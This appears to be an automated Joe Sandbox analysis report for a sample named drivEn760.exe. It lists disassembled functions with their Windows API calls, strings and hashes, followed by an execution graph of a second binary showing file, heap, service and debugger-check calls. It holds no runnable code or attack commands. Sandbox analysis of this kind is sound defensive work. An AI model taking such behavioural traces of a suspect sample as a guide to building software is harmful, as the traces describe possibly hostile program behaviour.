                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                                            • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                                                                            • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                                            • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 2659869361-823278215
                                                                                                            • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                            • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                                                                            • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                            • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 0040566D
                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                                                              • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                                            • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                                                                            • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                                            • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\AppData\Local\Temp,0040313C,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\drivEn760.exe,C:\Users\user\AppData\Local\Temp\drivEn760.exe,80000000,00000003), ref: 00405F89
                                                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\AppData\Local\Temp,0040313C,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\drivEn760.exe,C:\Users\user\AppData\Local\Temp\drivEn760.exe,80000000,00000003), ref: 00405F99
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00405F83
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                            • API String ID: 2709904686-1943935188
                                                                                                            • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                            • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                                                                            • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                            • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060E5
                                                                                                            • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                                            • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                                                                            • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                                            • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:2.2%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:16.6%
                                                                                                            Total number of Nodes:711
                                                                                                            Total number of Limit Nodes:26
                                                                                                            execution_graph 29457 7ff63d48a490 284 API calls Concurrency::details::SchedulerBase::Create 29458 7ff63d476c78 110 API calls Concurrency::details::SchedulerBase::Create 29325 7ff63d4772a5 113 API calls Concurrency::details::SchedulerBase::Create 29331 7ff63d486e50 171 API calls 29471 7ff63d481850 184 API calls Concurrency::details::SchedulerBase::Create 29333 7ff63d549a60 104 API calls Concurrency::details::SchedulerBase::Create 28469 7ff63d545640 28470 7ff63d545668 Concurrency::details::SchedulerBase::Create 28469->28470 28471 7ff63d5456f3 28470->28471 28482 7ff63d5ee0f0 28470->28482 28495 7ff63d5ed580 28471->28495 28475 7ff63d545684 GetFileAttributesW 28477 7ff63d545694 28475->28477 28477->28471 28479 7ff63d5456e8 CreateDirectoryW 28477->28479 28480 7ff63d5456e3 28477->28480 28481 7ff63d5456c2 CreateDirectoryW 28477->28481 28478 7ff63d54570d 28479->28471 28480->28479 28481->28477 28481->28480 28484 7ff63d5ee118 28482->28484 28483 7ff63d5ee145 28486 7ff63d5ee164 28483->28486 28492 7ff63d5ee182 28483->28492 28510 7ff63d53f780 GetProcessHeap RtlFreeHeap 28483->28510 28484->28483 28485 7ff63d5ee1ee 28484->28485 28488 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 28485->28488 28489 7ff63d5ee214 28485->28489 28493 7ff63d5ee232 28485->28493 28486->28492 28514 7ff63d53f700 GetProcessHeap HeapAlloc 28486->28514 28488->28489 28491 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 28489->28491 28489->28493 28491->28493 28492->28475 28493->28492 28494 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 28493->28494 28494->28492 28496 7ff63d5ed58d 28495->28496 28497 7ff63d5456fd 28495->28497 28498 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 28496->28498 28499 7ff63d618fb0 28497->28499 28498->28497 28500 7ff63d618fb9 28499->28500 28501 7ff63d618fc4 28500->28501 28502 7ff63d619d10 RtlCaptureContext RtlLookupFunctionEntry 28500->28502 28501->28478 28503 7ff63d619d95 28502->28503 28504 7ff63d619d54 RtlVirtualUnwind 28502->28504 28505 7ff63d619db7 IsDebuggerPresent 28503->28505 28504->28505 28592 7ff63d61d2d0 28505->28592 28507 7ff63d619e16 SetUnhandledExceptionFilter UnhandledExceptionFilter 28508 7ff63d619e3e GetCurrentProcess TerminateProcess 28507->28508 28509 7ff63d619e34 _lock 28507->28509 28508->28478 28509->28508 28511 7ff63d53f7a1 GetLastError GetProcessHeap 28510->28511 28512 7ff63d53f7c9 28510->28512 28518 7ff63d523fb0 28511->28518 28512->28486 28515 7ff63d53f746 28514->28515 28516 7ff63d53f722 28514->28516 28515->28492 28566 7ff63d524180 28516->28566 28521 7ff63d523b10 28518->28521 28522 7ff63d523b46 EnterCriticalSection 28521->28522 28523 7ff63d523f82 28521->28523 28524 7ff63d523b6c Concurrency::details::SchedulerBase::Create 28522->28524 28529 7ff63d523ca2 Concurrency::details::SchedulerBase::Create 28522->28529 28525 7ff63d618fb0 Concurrency::details::SchedulerBase::Create 8 API calls 28523->28525 28528 7ff63d523b79 GetLocalTime 28524->28528 28527 7ff63d523f92 28525->28527 28526 7ff63d523f65 LeaveCriticalSection 28526->28523 28527->28512 28558 7ff63d5e89a0 28528->28558 28529->28526 28565 7ff63d5e8900 103 API calls Concurrency::details::SchedulerBase::Create 28529->28565 28532 7ff63d523bd5 WriteFile 28564 7ff63d5e8900 103 API calls Concurrency::details::SchedulerBase::Create 28532->28564 28559 7ff63d5e89cc Concurrency::details::SchedulerBase::Create 28558->28559 28560 7ff63d5e89e8 28559->28560 28561 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 28559->28561 28563 7ff63d5e8a04 Concurrency::details::SchedulerBase::Create 28559->28563 28562 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 28560->28562 28560->28563 28561->28560 28562->28563 28563->28532 28567 7ff63d5241a1 Concurrency::details::SchedulerBase::Create 28566->28567 28591 7ff63d5e8900 103 API calls Concurrency::details::SchedulerBase::Create 28567->28591 28592->28507 28593 7ff63d53b440 28594 7ff63d53b495 Concurrency::details::SchedulerBase::Create 28593->28594 28655 7ff63d545550 28594->28655 28597 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 28598 7ff63d53b4d1 28597->28598 28599 7ff63d53bcca 28598->28599 28601 7ff63d523fb0 Concurrency::details::SchedulerBase::Create 103 API calls 28598->28601 28600 7ff63d618fb0 Concurrency::details::SchedulerBase::Create 8 API calls 28599->28600 28602 7ff63d53bcda 28600->28602 28603 7ff63d53b507 ReadFile 28601->28603 28604 7ff63d53b53c 28603->28604 28605 7ff63d53b9e0 28603->28605 28604->28605 28607 7ff63d523fb0 Concurrency::details::SchedulerBase::Create 103 API calls 28604->28607 28606 7ff63d53bca1 CloseHandle 28605->28606 28608 7ff63d53ba23 SetFilePointer 28605->28608 28606->28599 28609 7ff63d53b557 ReadFile 28607->28609 28608->28606 28610 7ff63d53ba4a 28608->28610 28609->28605 28611 7ff63d53b57e 28609->28611 28612 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 28610->28612 28611->28605 28613 7ff63d523fb0 Concurrency::details::SchedulerBase::Create 103 API calls 28611->28613 28614 7ff63d53ba52 ReadFile 28612->28614 28615 7ff63d53b59c 28613->28615 28616 7ff63d53bc99 28614->28616 28617 7ff63d53ba76 28614->28617 28615->28605 28619 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 28615->28619 28618 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 28616->28618 28617->28616 28620 7ff63d5f0b10 103 API calls 28617->28620 28618->28606 28621 7ff63d53b5bb ReadFile 28619->28621 28622 7ff63d53baa7 28620->28622 28623 7ff63d53b5e9 28621->28623 28624 7ff63d53b9bf 28621->28624 28622->28616 28625 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 28622->28625 28623->28624 28626 7ff63d523fb0 Concurrency::details::SchedulerBase::Create 103 API calls 28623->28626 28627 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 28624->28627 28634 7ff63d53bac2 28625->28634 28628 7ff63d53b603 28626->28628 28627->28605 28667 7ff63d5f0b10 28628->28667 28630 7ff63d53b62a 28630->28624 28632 7ff63d53b659 GetSystemDefaultLangID 28630->28632 28633 7ff63d53b64b 28630->28633 28631 7ff63d5f19e0 103 API calls 28631->28634 28632->28633 28637 7ff63d523fb0 Concurrency::details::SchedulerBase::Create 103 API calls 28633->28637 28634->28631 28641 7ff63d53bb4a 28634->28641 28635 7ff63d5f19e0 103 API calls 28635->28641 28636 7ff63d53bc76 28638 7ff63d5f1b10 103 API calls 28636->28638 28643 7ff63d53b677 28637->28643 28638->28616 28639 7ff63d53b6ba 28644 7ff63d523fb0 Concurrency::details::SchedulerBase::Create 103 API calls 28639->28644 28641->28635 28650 7ff63d53bb90 28641->28650 28642 7ff63d5f19e0 103 API calls 28642->28650 28643->28639 28672 7ff63d5f19e0 28643->28672 28645 7ff63d53b6cb 28644->28645 28646 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 28645->28646 28649 7ff63d53b6e2 28646->28649 28647 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 28647->28650 28651 7ff63d5f19e0 103 API calls 28649->28651 28653 7ff63d53b998 28649->28653 28654 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 28649->28654 28685 7ff63d5ddcf0 103 API calls Concurrency::details::SchedulerBase::Create 28649->28685 28650->28636 28650->28642 28650->28647 28651->28649 28677 7ff63d5f1b10 28653->28677 28654->28649 28656 7ff63d545597 Concurrency::details::SchedulerBase::Create 28655->28656 28686 7ff63d5ee2f0 28656->28686 28659 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 28660 7ff63d5455e5 28659->28660 28661 7ff63d54560d 28660->28661 28662 7ff63d5455eb GetLastError 28660->28662 28664 7ff63d618fb0 Concurrency::details::SchedulerBase::Create 8 API calls 28661->28664 28662->28661 28663 7ff63d5455f6 GetLastError 28662->28663 28665 7ff63d523fb0 Concurrency::details::SchedulerBase::Create 103 API calls 28663->28665 28666 7ff63d53b4b9 28664->28666 28665->28661 28666->28597 28668 7ff63d5f0b30 28667->28668 28669 7ff63d5f0bf1 28667->28669 28668->28669 28671 7ff63d53f700 103 API calls 28668->28671 28669->28630 28670 7ff63d5f0b7e 28670->28630 28671->28670 28673 7ff63d5f19e9 28672->28673 28675 7ff63d5f19f1 28672->28675 28673->28643 28674 7ff63d5f1a04 28674->28643 28675->28674 28698 7ff63d5f55b0 28675->28698 28678 7ff63d5f1b1e 28677->28678 28679 7ff63d5f1b27 28677->28679 28678->28624 28680 7ff63d5f1b3a 28679->28680 28681 7ff63d5f1b5d 28679->28681 28683 7ff63d53f780 103 API calls 28679->28683 28680->28624 28684 7ff63d53f780 103 API calls 28681->28684 28682 7ff63d5f1b8e 28682->28624 28683->28681 28684->28682 28685->28649 28687 7ff63d5ee30d Concurrency::details::SchedulerBase::Create 28686->28687 28688 7ff63d5ee372 Concurrency::details::SchedulerBase::Create 28687->28688 28689 7ff63d5ee354 28687->28689 28691 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 28687->28691 28690 7ff63d5ee3fb 28688->28690 28692 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 28688->28692 28696 7ff63d5ee419 Concurrency::details::SchedulerBase::Create 28688->28696 28689->28688 28693 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 28689->28693 28695 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 28690->28695 28690->28696 28691->28689 28692->28690 28693->28688 28694 7ff63d5455a4 CreateFileW 28694->28659 28695->28696 28696->28694 28697 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 28696->28697 28697->28694 28699 7ff63d5f55f5 28698->28699 28706 7ff63d549e90 103 API calls Concurrency::details::SchedulerBase::Create 28699->28706 29335 7ff63d475670 StartServiceCtrlDispatcherW 29476 7ff63d481470 105 API calls 29477 7ff63d4c6460 124 API calls Concurrency::details::SchedulerBase::Create 29336 7ff63d523650 129 API calls Concurrency::details::SchedulerBase::Create 29479 7ff63d484060 155 API calls 28707 7ff63d53e920 28797 7ff63d54b310 28707->28797 28709 7ff63d53ee35 28710 7ff63d618fb0 Concurrency::details::SchedulerBase::Create 8 API calls 28709->28710 28711 7ff63d53ee45 28710->28711 28712 7ff63d53e93e Concurrency::details::SchedulerBase::Create 28712->28709 28800 7ff63d5e8250 103 API calls Concurrency::details::SchedulerBase::Create 28712->28800 28714 7ff63d53e962 28715 7ff63d53e971 28714->28715 28716 7ff63d53e984 28714->28716 28825 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28715->28825 28718 7ff63d53e982 28716->28718 28826 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28716->28826 28720 7ff63d53e9e9 28718->28720 28827 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28718->28827 28722 7ff63d53ea0c 28720->28722 28829 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28720->28829 28724 7ff63d53ea19 28722->28724 28725 7ff63d53ea2c 28722->28725 28830 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28724->28830 28728 7ff63d53ea2a 28725->28728 28831 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28725->28831 28726 7ff63d53e9c6 28726->28720 28828 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28726->28828 28730 7ff63d53ea57 28728->28730 28731 7ff63d53ea6a 28728->28731 28832 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28730->28832 28734 7ff63d53ea68 28731->28734 28833 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28731->28833 28735 7ff63d53eaa8 28734->28735 28736 7ff63d53ea95 28734->28736 28739 7ff63d53eaa6 28735->28739 28835 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28735->28835 28834 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28736->28834 28741 7ff63d53eae6 28739->28741 28742 7ff63d53ead3 28739->28742 28744 7ff63d53eae4 28741->28744 28837 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28741->28837 28836 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28742->28836 28746 7ff63d53eb11 28744->28746 28747 7ff63d53eb24 28744->28747 28838 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28746->28838 28748 7ff63d53eb22 28747->28748 28839 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28747->28839 28751 7ff63d53eb50 28748->28751 28752 7ff63d53eb63 28748->28752 28840 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28751->28840 28754 7ff63d53eb61 28752->28754 28841 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28752->28841 28756 7ff63d53ebaa 28754->28756 28842 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28754->28842 28758 7ff63d53ebcf 28756->28758 28843 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28756->28843 28760 7ff63d53ec0d 28758->28760 28761 7ff63d53ebe9 28758->28761 28762 7ff63d53ec38 28758->28762 28763 7ff63d53ecad 28760->28763 28764 7ff63d53ecf5 28760->28764 28766 7ff63d53ebee 28761->28766 28767 7ff63d53ec25 28761->28767 28847 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28762->28847 28769 7ff63d53ece2 28763->28769 28770 7ff63d53ecb2 28763->28770 28853 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28764->28853 28773 7ff63d53ebf3 28766->28773 28774 7ff63d53ec12 28766->28774 28846 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28767->28846 28852 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28769->28852 28776 7ff63d53ecb7 28770->28776 28777 7ff63d53eccf 28770->28777 28771 7ff63d53ec49 28779 7ff63d53ec72 28771->28779 28848 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28771->28848 28773->28760 28844 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28773->28844 28845 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28774->28845 28775 7ff63d53eccd 28780 7ff63d53ed25 28775->28780 28854 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28775->28854 28776->28775 28850 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28776->28850 28851 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28777->28851 28779->28760 28849 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28779->28849 28791 7ff63d53ed44 28780->28791 28855 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28780->28855 28789 7ff63d53ee15 28790 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 28789->28790 28790->28709 28792 7ff63d53e010 103 API calls 28791->28792 28795 7ff63d53eda3 28791->28795 28792->28791 28793 7ff63d53ee0b 28801 7ff63d53e2e0 28793->28801 28795->28789 28795->28793 28856 7ff63d53e010 103 API calls Concurrency::details::SchedulerBase::Create 28795->28856 28798 7ff63d54b330 28797->28798 28799 7ff63d54b320 SHTestTokenMembership 28797->28799 28798->28712 28799->28712 28800->28714 28802 7ff63d53e311 28801->28802 28807 7ff63d53e331 Concurrency::details::SchedulerBase::Create 28801->28807 28909 7ff63d545b60 103 API calls Concurrency::details::SchedulerBase::Create 28802->28909 28804 7ff63d53e32c 28805 7ff63d618fb0 Concurrency::details::SchedulerBase::Create 8 API calls 28804->28805 28806 7ff63d53e401 28805->28806 28806->28789 28910 7ff63d5497f0 105 API calls Concurrency::details::SchedulerBase::Create 28807->28910 28809 7ff63d53e364 28810 7ff63d53e378 28809->28810 28811 7ff63d53e36e 28809->28811 28912 7ff63d475ff0 104 API calls Concurrency::details::SchedulerBase::Create 28810->28912 28911 7ff63d5e7fb0 103 API calls Concurrency::details::SchedulerBase::Create 28811->28911 28814 7ff63d53e376 28815 7ff63d53e37d 28814->28815 28816 7ff63d5e89a0 Concurrency::details::SchedulerBase::Create 103 API calls 28815->28816 28817 7ff63d53e396 28816->28817 28857 7ff63d5479e0 28817->28857 